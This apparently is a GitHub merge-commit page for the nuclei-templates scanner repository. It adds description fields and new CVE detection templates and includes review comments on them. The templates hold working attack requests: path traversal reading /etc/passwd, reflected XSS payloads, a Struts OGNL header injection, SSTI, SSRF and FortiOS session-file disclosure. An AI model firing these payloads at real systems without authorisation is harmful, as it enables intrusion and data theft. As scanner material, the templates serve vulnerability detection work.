Merge pull request #345 from aqme/master

Add *description* property to nuclei-templates
patch-1
bauthard 2020-08-28 01:09:39 +05:30 committed by GitHub
commit 747aa48d09
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
125 changed files with 2198 additions and 46 deletions

@ -4,6 +4,7 @@ info:
name: Oracle Content Server XSS
author: madrobot
severity: medium
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
requests:
- method: GET

@ -4,6 +4,7 @@ info:
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
author: Random-Robbie
severity: high
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
requests:
- method: GET

@ -3,6 +3,7 @@ info:
author: "Random Robbie"
name: "Struts2 RCE "
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
# This template supports the detection part only.
# Do not test any website without permission
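
Review bot: the new description has a grammar slip, "an attackers invalid Content-Type HTTP header" should be "an attacker's invalid Content-Type HTTP header". "Struts is vulnerable" also reads as if every Struts release is affected; name the affected version range the way the other descriptions in this PR do.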

@ -3,6 +3,7 @@ info:
author: "Harsh Bothra"
name: "Nginx Remote Integer Overflow"
severity: medium
description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
# This template supports the detection part only.
# Do not test any website without permission
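
Review bot: the description is awkward: "are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information" should read "contain an integer overflow in the range filter module that can leak potentially sensitive information via a specially crafted request", and "since 0.5.6" should be "from 0.5.6".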

@ -4,6 +4,7 @@ info:
name: Jira IconURIServlet SSRF
author: Ice3man
severity: high
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
requests:
- method: GET

@ -4,7 +4,7 @@ info:
name: CVE-2017-9841
author: Random-Robbie
severity: High
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
# Reference to exploit
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
# https://github.com/RandomRobbieBF/phpunit-brute
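
Review bot: `name: CVE-2017-9841` just repeats the id; give it a descriptive title like the other templates (e.g. "PHPUnit eval-stdin.php Remote Code Execution"). The `severity: High` context line is capitalized while every other template in this PR uses lowercase values, so normalize it while the file is being touched, and the new description ends without a period.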

@ -4,6 +4,7 @@ info:
name: Jolokia XSS
author: mavericknerd
severity: high
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
requests:
- method: GET

@ -4,7 +4,7 @@ info:
name: Nuxeo Authentication Bypass Remote Code Execution
author: madrobot
severity: high
description: Nuxeo Authentication Bypass Remote Code Execution &lt; 103 using a SSTI
requests:
- method: GET
path:
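
Review bot: the description contains the HTML entity `&lt;`, which nuclei will print literally; it should be `<`. Beyond that the description only repeats the name: say what "103" refers to (presumably a version) and which endpoint or template engine is injected, and "a SSTI" should be "an SSTI".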

@ -4,6 +4,7 @@ info:
name: Wordpress unauthenticated stored xss
author: nadino
severity: medium
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
requests:
- method: POST
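
Review bot: the name says "unauthenticated stored xss" but the new description says the XSS is reached "in an authenticated theme-localization.php request to wp-admin/admin.php"; one of the two is wrong and they should agree before merging. Also "Wordpress" should be "WordPress".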

@ -4,6 +4,7 @@ info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
author: madrobot & dwisiswant0
severity: high
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
requests:
- method: GET

@ -4,6 +4,7 @@ info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot & dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
requests:
- method: GET

@ -4,7 +4,7 @@ info:
name: Oracle WebCenter Sites XSS
author: madrobot
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
requests:
- method: GET
path:
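
Review bot: "Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware" says nothing about what the template tests; state that it is a reflected XSS and name the servlet and parameter, as the other descriptions in this PR do.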

@ -4,6 +4,7 @@ info:
name: Nexus Repository Manager 3 RCE
auhtor: hetroublemakr
severity: high
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
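
Review bot: the context line above `severity` reads `auhtor:`, so the author field is silently ignored by the parser; fix it to `author:` while adding the description. "JavaEL" should be "Java EL".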

@ -4,6 +4,7 @@ info:
name: Sonatype Nexus Repository RCE
auhtor: hetroublemakr
severity: high
description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
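
Review bot: same `auhtor:` typo as the previous Nexus template. The description is advisory prose ("requiring immediate action") rather than a statement of the flaw; trim it to the technical claim, i.e. an attacker with an administrative NXRM account can execute arbitrary code via a crafted request. Both Nexus templates point at the same CVE-2020-10199 article even though this one describes an authenticated flaw; confirm the reference is the right advisory for this template.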

@ -4,7 +4,7 @@ info:
name: CVE-2020-12720 vBulletin SQLI
author: pdnuclei - projectdiscovery.io
severity: critical
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
# This template supports the detection part only.
# Do not test any website without permission
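
Review bot: the name says SQLI but the description only says "has incorrect access control"; mention that the exploitable impact is SQL injection, which is what the linked PoC and the template exercise.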

@ -4,6 +4,7 @@ info:
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
author: dwisiswant0
severity: critical
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
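
Review bot: the version ranges disagree: the new description says "Netsweeper through 6.4.3" while the existing comment below says "for versions 6.4.4 and". The name also says "Python Code Injection" while the description says "injection of shell metacharacters"; settle on one account of the flaw.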

@ -4,6 +4,7 @@ info:
name: Unauthenticated Grafana DoS
author: pxmme1337
severity: medium
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
# Source:- https://www.exploit-db.com/exploits/48638
# WARNING
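
Review bot: the name is "Unauthenticated Grafana DoS" but the new description describes an SSRF in the avatar feature; either rename the template or add a sentence explaining that the SSRF is what the linked exploit abuses for the DoS, so name and description match.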

@ -4,6 +4,7 @@ info:
name: Artica Web Proxy 4.30 OS Command Injection
author: dwisiswant0
severity: high
description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
# Artica Web Proxy 4.30.00000000
# allows an authenticated remote attacker
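
Review bot: the new description duplicates the comment block directly beneath it; drop the comment now that `description` exists. The version strings also differ ("4.30.000000" in the description, "4.30.00000000" in the comment).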

@ -4,6 +4,7 @@ info:
name: Artica Web Proxy 4.30 Authentication Bypass
author: dwisiswant0
severity: critical
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
# Artica Web Proxy 4.30.00000000
# allows remote attacker to bypass privilege detection
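
Review bot: as in the previous Artica template, the description duplicates the comment below it; remove the comment. "allows remote attacker" should be "allows a remote attacker".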

@ -15,9 +15,9 @@ info:
requests:
- payloads:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- "sysctl kern.ostype" # macOS
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- "sysctl kern.ostype" # macOS
port:
- "80"
- "443"

@ -4,6 +4,7 @@ info:
name: IceWarp WebMail XSS
author: pdnuclei & dwisiswant0
severity: medium
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
# source:- https://www.exploit-db.com/exploits/47988
# https://twitter.com/sagaryadav8742/status/1275170967527006208

@ -4,6 +4,7 @@ info:
name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
author: dwisiswant0
severity: high
description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
requests:
- method: GET

@ -4,6 +4,7 @@ info:
name: Apache Tomcat RCE by deserialization
author: dwisiswant0
severity: high
description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server
requests:
- method: GET
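
Review bot: the description is cut off mid-sentence ("...if a) an attacker is able to control the contents and name of a file on the server"); the remaining conditions are missing, so a reader cannot tell what the template actually tests. Finish the sentence or replace it with a one-line summary of the deserialization flaw.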

@ -4,6 +4,8 @@ info:
name: Apache OFBiz XML-RPC Java Deserialization
author: dwisiswant0
severity: medium
description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
# This temaplte detects a Java deserialization vulnerability in Apache
# OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
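
Review bot: "XML-RPC request are vulnerable" should be "XML-RPC requests are vulnerable", and the context comment has "temaplte" for "template".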

@ -4,6 +4,7 @@ info:
name: SEOmatic < 3.3.0 Server-Side Template Injection
author: dwisiswant0
severity: high
description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
requests:
- method: GET

@ -5,16 +5,15 @@ info:
severity: high
requests:
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
# https://github.com/grafana/grafana/issues/14755
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
# https://github.com/grafana/grafana/issues/14755
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
- payloads:
# grafana_username:
# - admin
# grafana_username:
# - admin
grafana_password:
- prom-operator

@ -4,6 +4,7 @@ info:
name: Security.txt File
author: bad5ect0r
severity: info
description: The website defines a security policy.
requests:
- method: GET

@ -0,0 +1,22 @@
id: CVE-2017-10075
info:
name: Oracle Content Server XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(31337)</script>"
part: body

@ -0,0 +1,20 @@
id: CVE-2017-14849
info:
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
author: Random-Robbie
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

@ -0,0 +1,29 @@
id: CVE-2017-5638
info:
author: "Random Robbie"
name: "Struts2 RCE "
severity: critical
# This template supports the detection part only.
# Do not test any website without permission
# Exploit:- https://github.com/mazen160/struts-pwn
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word
words:
- "Bounty Plz"
part: header
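
Review bot: the comment says "This template supports the detection part only", but the `Content-Type` value is an OGNL expression that the target evaluates (it calls `addHeader` on the response). That is about as harmless as the proof gets, but it is still server-side code execution, so the comment should say so rather than implying a passive check.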

@ -0,0 +1,29 @@
id: CVE-2017-7529
info:
author: "Harsh Bothra"
name: "Nginx Remote Integer Overflow"
severity: medium
# This template supports the detection part only.
# Do not test any website without permission
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=-17208,-9223372036854758792
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 206
- type: word
words:
- Content-Range
part: all
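
Review bot: `Range: bytes=-17208,-9223372036854758792` is a multi-range request, so a 206 answer would normally be `multipart/byteranges` rather than a single `Content-Range` header; confirm against a vulnerable instance which marker actually appears, and that a patched nginx (which rejects the overflowing range) does not also answer 206 with `Content-Range` to this request, since the matcher would then flag any range-capable server.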

@ -0,0 +1,16 @@
id: CVE-2017-9506
info:
name: Jira IconURIServlet SSRF
author: Ice3man
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
matchers:
- type: word
words:
- "ipinfo.io/missingauth"
part: body
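
Review bot: the matcher depends on ipinfo.io returning a body containing "ipinfo.io/missingauth", i.e. on a third party's current response text, and it makes the target fetch that third party during every scan. Point `consumerUri` at a host you control (the other templates use Burp Collaborator) or match on a property that does not change when ipinfo.io changes its error page.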

@ -0,0 +1,36 @@
id: CVE-2017-9841
info:
name: CVE-2017-9841
author: Random-Robbie
severity: High
# Reference to exploit
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
# https://github.com/RandomRobbieBF/phpunit-brute
requests:
- method: GET
path:
- "{{BaseURL}}/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/laravel_api/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/api/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/apps/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/backup/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/oldsite/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/lib/phpunit/phpunit/phpunit"
- "{{BaseURL}}/modules/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/old/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/zend/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/yii/vendor/phpunit/phpunit/phpunit"
matchers-condition: and
matchers:
- type: word
words:
- "this version of phpunit requires php 5"
part: body
- type: status
status:
- 200
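
Review bot: every path requests the `phpunit` CLI script, not `Util/PHP/eval-stdin.php`, which is the vulnerable file; a hit therefore shows an exposed vendor directory, not that eval-stdin.php evaluates a `<?php` POST body. A POST to eval-stdin.php with a harmless `<?php echo` marker would test the actual flaw. Also the word "this version of phpunit requires php 5" is all lowercase; confirm the matcher is case-insensitive or copy the casing the script really prints, and `severity: High` should be lowercase like the other templates.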

@ -0,0 +1,23 @@
id: CVE-2018-0296
info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: medium
# https://github.com/yassineaboukir/CVE-2018-0296
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
matchers-condition: and
matchers:
- type: word
words:
- "///sessions"
part: body
- type: status
status:
- 200

@ -0,0 +1,22 @@
id: CVE-2018-1000129
info:
name: Jolokia XSS
author: mavericknerd
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
- "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
- "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1337)>"
part: body
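
Review bot: the third path appends `:8080` to `{{BaseURL}}`; BaseURL already carries scheme, host and any port, so a target of `https://host:8443` becomes `https://host:8443:8080/jolokia/...`. Build the alternate-port request from `{{Hostname}}` or leave port selection to the user. The same pattern appears in the new Crowd (`:8095`), WebLogic (`:7001`) and Oracle BI (`:9502`) templates.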

@ -0,0 +1,22 @@
id: CVE-2018-11409
info:
name: Splunk Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
requests:
- method: GET
path:
- '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
- '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- licenseKeys

@ -0,0 +1,23 @@
id: CVE-2018-11759
info:
name: Apache Tomcat JK Status Manager Access
author: Harsh Bothra
severity: medium
# Source:- https://github.com/immunIT/CVE-2018-11759
requests:
- method: GET
path:
- '{{BaseURL}}/jkstatus'
- '{{BaseURL}}/jkstatus;'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "JK Status Manager"

@ -0,0 +1,22 @@
id: CVE-2018-1247
info:
name: RSA Authentication Manager XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
matchers-condition: and
matchers:
- type: word
words:
- "application/x-shockwave-flash"
part: header
- type: word
words:
- "javascript:alert(1337)"
part: body

@ -0,0 +1,21 @@
id: CVE-2018-1271
info:
name: Spring MVC Directory Traversal Vulnerability
author: hetroublemakr
severity: High
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
requests:
- method: GET
path:
- '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
matchers-condition: and
matchers:
- type: word
words:
- 'for 16-bit app support'
- type: status
status:
- 200
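
Review bot: `severity: High` should be lowercase for consistency. Both paths read `windows/win.ini`, so the template can only ever fire on a Windows host; add a comment saying so, otherwise a miss on a Linux deployment reads as "not vulnerable".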

@ -0,0 +1,15 @@
id: CVE-2018-13379
info:
name: FortiOS - Credentials Disclosure
author: organiccrap
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
matchers:
- type: word
words:
- "var fgt_lang ="
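
Review bot: there is no status matcher and the only word is `var fgt_lang =`, which is how every legitimate language file served by `/remote/fgt_lang` begins; a device that answers the traversal path with a default language file would be reported as vulnerable. Match on content that only appears when `sslvpn_websession` is actually returned, or at least add a check that the body is not a normal language definition.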

@ -0,0 +1,19 @@
id: CVE-2018-14728
info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
author: madrobot
severity: high
requests:
- method: POST
path:
- "{{BaseURL}}/filemanager/upload.php"
body: "fldr=&url=file:///etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
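
Review bot: `upload.php` fetches the `url=` resource and stores it as an upload; confirm that its response body actually echoes the fetched `/etc/passwd`. If it only reports the upload, the regex can never match and the check needs a second request for the stored file.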

@ -0,0 +1,16 @@
id: CVE-2018-16341
info:
name: Nuxeo Authentication Bypass Remote Code Execution
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
matchers:
- type: word
words:
- "31333333337"
part: body

@ -0,0 +1,17 @@
id: CVE-2018-18069
info:
name: Wordpress unauthenticated stored xss
author: nadino
severity: medium
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
matchers:
- type: dsl
dsl:
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
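
Review bot: the body is a single-quoted YAML scalar, in which `\"` is not an escape, so the request goes out with literal backslashes (`EN\"><html xmlns=\"hacked`). If a bare `"` is intended, switch to a double-quoted scalar or drop the backslashes. Also, a 302 carrying the `_icl_current_admin_language` cookie shows that WPML handled the request, not that the payload was stored; a follow-up GET that looks for the injected markup would make this a real stored-XSS check.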

@ -0,0 +1,16 @@
id: CVE-2018-19439
info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
author: madrobot & dwisiswant0
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
matchers:
- type: word
words:
- "<script>alert(1337)</script><!--</TITLE>"
part: body

@ -0,0 +1,20 @@
id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot & dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- (?mi)timeout:\salert\(document\.domain\)
part: body

@ -0,0 +1,16 @@
id: CVE-2018-2791
info:
name: Oracle WebCenter Sites XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
matchers:
- type: word
words:
- "<script>alert(1337)</script>"
part: body
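
Review bot: `cid={ID}` is a literal placeholder, not a nuclei variable, so the request is sent with the string `{ID}` in it. Either supply a real asset id, or add a comment explaining that the value does not matter for the reflection.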

@ -0,0 +1,19 @@
id: CVE-2018-3714
info:
name: node-srv Path Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

@ -0,0 +1,20 @@
id: CVE-2018-3760
info:
name: Rails cve-2018-3760
author: 0xrudra
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
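
Review bot: `name: Rails cve-2018-3760` repeats the id; describe what it is (path traversal via a `file://` URI under `/assets`) like the other templates do.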

@ -0,0 +1,20 @@
id: CVE-2018-5230
info:
name: Atlassian Confluence Status-List XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "SRC=\"javascript:alert(1337)\">"
part: body

@ -0,0 +1,20 @@
id: CVE-2018-7490
info:
name: uWSGI PHP Plugin Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

@ -0,0 +1,20 @@
id: CVE-2019-10475
info:
name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1337)>"
part: body
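
Review bot: the query string carries a hard-coded `Jenkins-Crumb` value (twice, once inside the `json=` blob) captured from one person's session; a crumb is a per-session CSRF token, so it is meaningless against any other host. Since this is a GET, drop the crumb and the `json=` blob and keep only the parameters needed to reflect `label`.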

@ -0,0 +1,19 @@
id: CVE-2019-11248
info:
name: exposed_pprof
author: 0xceeb
severity: medium
# https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
# http://mmcloughlin.com/posts/your-pprof-is-showing
requests:
- method: GET
path:
- "{{BaseURL}}/debug/pprof/"
matchers:
- type: word
words:
- "Types of profiles available:"
- "Profile Descriptions"
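
Review bot: `name: exposed_pprof` should be a readable title. More importantly, the check is a generic `/debug/pprof/` probe that matches any Go service with the pprof handler mounted, whereas CVE-2019-11248 is specifically the Kubernetes kubelet exposing pprof on its unauthenticated healthz port; either describe the template as generic pprof exposure or scope it to the kubelet port and path.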

@ -0,0 +1,21 @@
id: CVE-2019-11510
info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: high
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
requests:
- method: GET
path:
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

@ -0,0 +1,38 @@
id: CVE-2019-11580
info:
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
author: dwisiswant0
severity: critical
# Atlassian Crowd and Crowd Data Center
# had the pdkinstall development plugin incorrectly enabled in release builds.
# Attackers who can send unauthenticated or authenticated requests
# to a Crowd or Crowd Data Center instance can exploit this vulnerability
# to install arbitrary plugins, which permits remote code execution on
# systems running a vulnerable version of Crowd or Crowd Data Center.
# All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
# from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
# from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
# from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
# and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
# -
